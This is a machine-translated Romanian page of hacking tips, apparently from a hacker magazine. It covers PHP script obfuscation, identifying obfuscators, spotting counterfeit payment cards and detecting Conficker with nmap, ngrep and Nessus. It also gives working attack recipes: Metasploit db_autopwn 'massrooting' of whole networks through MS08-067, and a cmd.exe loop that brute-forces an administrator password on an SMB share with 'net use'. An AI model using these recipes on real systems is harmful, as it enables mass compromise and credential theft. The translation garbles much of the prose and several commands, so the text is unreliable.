Easy-hack - Articolele mele - Editura - zonahaka-Totul despre hacking, hacking, xaker
Obiectiv: criptați script PHP cod
decizie
Am enumerat câteva proiecte populare. De fapt, aceste produse sunt mult mai mult, iar în căutarea lor vă va ajuta să www.google.com :).
Acum, ia în considerare procedura pentru a ascunde conținutul PHP-script folosind www.zorex.info de servicii on-line:
1. Ia codul script care trebuie să ne bruiază. De exemplu:
2. Du-te la site-ul www.zorex.info serviciu online.
3. Selectați în «Zorex PHP CryptZ» meniu de servicii și faceți clic pe link-ul.
4. Completați următoarele câmpuri:
Fișier sursă // php script-ul nostru
Decodor // Numele fișierului decodor Nume fișier
Zip ieșire // arhiva cu rezultatul (script + decodor)
Limita de la gazdă // restricție pe gazdă
Limita de la IP // restricție prin IP
5. pâine rezultat și a obține un link la arhiva cu scriptul criptat.
6. Despachetați arhiva, vom vedea interiorul celor două fișiere:
nash_skript.php;
dekoder_dlya_nashego_skripta.php.
7. nash_skript.php Deschideți și verificați codul kriptovat:
script codarea folosind
După cum puteți vedea, toate decente.
8. Și, în cele din urmă - decodor de test.
Am citat exemplul doar unul dintre multele servicii on-line pentru codul de criptare în PHP-script. Alegerea depinde de preferințele personale și cerințele algoritmului.
Obiectiv: Pentru a determina ofuscarea, care este criptat un script PHP
decizie
Recent, a existat un număr mare de diferite obfuscators de rulare și PHP-cod. cu atât mai greu de înțeles decât este bruiat de un script De fiecare dată: de multe ori restabili sorets - mai ușor decât pentru a determina tipul Obfuscator. Prin urmare, vom folosi un utilitar special numit PCL lui PHPiD, perfect potrivit pentru scopurile noastre. Programul este conceput pentru a determina și de protecție obfuscators PHP-cod și poate recunoaște 20 de algoritmi diferite, inclusiv:
de protecție definite
TrueBug PHP Encoder 1.0.2 (incl. GZIP), 1.0.3 / 1.0.4
NuSphere NuCoder
Zend Encoder / Zend Suite SafeGuard
ByteRun protector pentru PHP
SourceCop (inclusiv. Modul de protecție)
Codelock (inclusiv. Modul de protecție)
SourceGuardian pentru PHP
PHPCipher
phpSHIELD
CNCrypto
phtml Encoder
ionCube PHP Encoder
PHP LockIt! 1.8, 2.0 (inclusiv. GZIP)
Obfusc (Basic / Normal, ShowObfuscate)
Zorex PHP CryptZ (incl. Modul de protecție)
gencoder
DWebEncoder
Free PHP Encoder
PHP Compact
TrueBug PHP Obfuscator 1.1
PHPCoder / eAccelerator
obfuscators definite
Modele semantice Obfuscator
PHP Defender
PHP LockIt! (Modul Confuzie)
Raizlabs PHP Obfuscator
POBS - PHP Obfuscator
Luați în considerare succesiunea detaliată a acțiunilor pentru a rezolva problema:
Merge PHPiD utilități PCL de la DVD-ul nostru.
Rulați ehe'shnik phpid.exe.
Alegerea bruiază un script, de exemplu:
4. În tulzy vedea rezultatul: Free PHP Encoder - www.freephpencoder.com. Prin urmare, sarcina este finalizată: Protector este definit cu succes și sorets ridica script-ul meu în sine :).
P.S. Amintiți-vă că dimensiunea utilităților script analizate nu trebuie să depășească 1 metru, sau funcționalitatea nu este garantată.
Obiectiv: Pentru a distinge VISA / MASTERCARD carduri false din original
decizie
Terminale de plată și ATM-urile sunt acum nu merită decât în grajduri de porumb. O să-ți spun cum să se facă distincția stânga de pe cardul de credit inițial. Pentru a face acest lucru, am compilat o listă mică de trăsături caracteristice. Ghidându-le, puteți identifica cu ușurință un fals:
Aflați microimprimate în jurul sigla VISA. În cazul în care este aproape imposibil de citit și șters de pe cartela - asigurați-vă că înainte de stânga!
Următorul important detaliu - holograma. fundal holograma originală este curat, o oglindă, iar detaliile despre imagine sunt ușor de distins. Caracteristica principală a holograme contrafăcute - lipsa de volum. În plus, holograma „stânga“ peels ușor off (de obicei, un simplu autocolant). Real holograma este imposibil să bat peste un cui sau se detașeze un card de credit într-un alt mod.
Uită-te la banda pentru semnătura de pe partea verso a cardului. Pe banda originală, în cele mai multe cazuri, există fond de inscripția «MasterCard» sau «Visa» (în funcție de tipul de card). În plus, banda trebuie să fie plasat numărul de card și codul de securitate.
Uneori falsifică acoperită pe ambele fețe utilizate laminat - acest film transparent, se desprinde ușor la margini, mai ales dacă ea este un pic de ajutor.
Primele patru cifre ale numărului cardului (BIN), duplicate de culoare contrastantă pot fi șterse cu un card fals. BIN pe original, nu pot fi șterse!
Este demn de atenție la simbolurile «V» și „MS“ (cu privire la tipurile respective de carduri). Acestea pot diferi de grosime standard / lățime.
imagini speciale B lumină ultravioletă pot fi absente de la carduri falsificate (de exemplu, un porumbel care zboară pe carduri VISA). Cel mai probabil, imaginea este neclară, sau va, sau nu va fi deloc.
Datele reprezentate grafic pe card trebuie să corespundă cu datele depuse pe banda magnetică!
Tu cu siguranță nu doar se confruntă cu problema de a avea caractere chirilice în calea profilului contului (amintiți-cadru Metasploit strâmb de lucru cu contul „Administrator“). În mod normal, redenumiți contul pe care nu au de lucru - a trebuit să copieze bibliotecile necesare și înregistrați-le mod manual.
În cele din urmă - o remarcă. Uchetki copiați profilul sub care stai, nu poți. Trebuie să mergi la orice alt al grupului „Administratori“ și copia de acolo.
Obiectiv: Recent, celebrul troian Conficker (ru.wikipedia.org/wiki/Conficker) a infectat o grămadă de mașini, și toate bazhnye. Cum să-i identifice?
decizie
1. Abordarea prin Nmap. Identificarea viermele poate fi scanat pe aceeași subrețea. script personalizat Util scris în Nmap SE - el a fost deja descrisă în edițiile anterioare. Acesta se face cu următoarea comandă:
nmap -PN -T4 -p139,445 -v --script = N-smb check-vulns --script-args sigure = 1 192.168.111.0/24,
unde
script - un steag care indică dacă să facă apel la script-ul, care este deja în cea mai recentă versiune de Nmap (Nmap 4.85BETA7).
pn - dezactivează Name Resolution Domain (DNR).
n - dezactivează verificarea pentru „vioiciune“ al gazdei.
Dezactivarea opțiunilor de mai sus crește în mod semnificativ viteza de scanare. Pentru rețelele la scară largă, folosiți comanda:
nmap -SC -PN -d -p445 -T4 --min-N hostgroup 256 --min-paralelism 64 --script = smb-check-vulns --script-ARGS = safe = 1 10.0.0.0/8
Datorită naturii scanerului vulnerabilitate, se recomandă să se joace în afara de 139 și 445 de porturi TCP. Scanarea rezultatele pe care le veți găsi înregistrări «Conficker: probabil CLEAN» sau «Conficker: Probabil INFECTATE».
2. Abordarea folosind nGREP. funcționalitate Ngrep este foarte bogat, de exemplu, vă permite să rulați volumul de trafic de căutare de sarcini utile (adică, informațiile care sunt stocate în pachetele de rețea ca datele). Semnătura lui Conficker pot fi găsite în aproape toate arhivele moderne și blog-uri de securitate a informațiilor - îl puteți utiliza în condiții de siguranță:
ngrep -qd eth0 -W singur -s 900 -X
0b0b4feebeb „port 445 tcp
și net dst 127.0.208.0/24 "
În primul rând, aveți nevoie de activitatea de rețea promonitorit și să înregistreze orice parte a sniffer de trafic, și apoi hrana pentru animale ngrep'u groapa.
3. Abordarea prin Nessus. Scanner populare, de asemenea, nu va fi de prisos. Există un plug-in special (nessus.org/plugins/index.php?view=singleid=36036), care vă permite să scape de toate gazdele și pentru a identifica victima. Printre altele, a numit-o „victima“ nu poate fi, deoarece se estimează valorile CVSSv2, Conficker are un nivel „critic“ de daune (critice / CVSS Base Score. 10.0). Pentru a identifica necesitatea de a efectua următoarele etape:
Nessus-fetch este configurat corespunzător pentru a primi un feed profesional
b) Căutăm un număr de plug pe 36036 și se aplică.
4. Abordarea folosind utilitarul Computer Technology Institute Bonn.
a) Descărcați remarcabil utilitar de rețea conceput doar pentru acest scop. Poate fi descărcat de aici - iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker.
b) Rulați comanda $ ./scs2.py 10.0.0.1 10.0.0.5
[NECUNOSCUT] 10.0.0.1: Nici un răspuns de la portul 445 / tcp.
[UNKNOWN] 10.0.0.2: Nu se poate rula NetpwPathCanonicalize.
5. Pars rezultate.
Problemă: Cum să utilizați Metasploit pentru a organiza massruting?
decizie
Nimic indecent :). Massruting - o masă de mașini infectate folosind un cunoscut (sau necunoscute) vulnerabilități. Dacă mai devreme pentru această acțiune organizația ar trebui să scrie script-uri Tuyev huchu, apoi Metasploit totul a devenit mai ușor. Trebuie doar să urmați câțiva pași.
1. sprijin pentru baza de date Georgia SQLite3:
MSFs> db_sqlite3 de sarcină [*] plugin încărcat cu succes: db_sqlite3
2. Inițializarea crearea unei noi baze de date:
MSF> db_create [*] Baza de date specificată există deja, conectarea [*] conectat cu succes la baza de date [*] Fișier: /root/.msf3/sqlite3.db
Pentru a accelera testele noastre folosim modulul built-NMAP'a pe gama de rețea:
MSF> db_nmap -B -PS445 -p445 -T AAA.BBB.CCC.0 Agresiv N / 24
3. Acest joc final - rula massruting privind vulnerabilitatea MS08-067:
MSFs> db_autopwn -e -p -b -m ms08_067
P.S. Pentru a colecta date statistice referitoare la activitatea Shell rezultat conduce o echipa> sesiuni de MSFs -l.
Obiectiv: Pentru a organiza un atac de dicționar pe un protejat prin parolă resurse partajate
decizie
1. compila un atac de dicționar. Să presupunem că acest lucru este un document text de 100 de cuvinte, câte unul pe fiecare rând. Sună-l passwords.txt.
2. Chiar de la linia de comandă cmd.exe, tastați următoarea comandă.
PENTRU / F "indicativele = 1 *" % i în (passwords.txt) face uz net # 92, # 92, # 92 192.168.1.1; IPC $% i / u: Administrator
3. Bucura-te procesul de enumerare rapidă.
P.S. Metoda este relevantă numai în atacul asupra parola de administrator. Folosind forta bruta la alte autentificările va duce imediat la blocarea contului.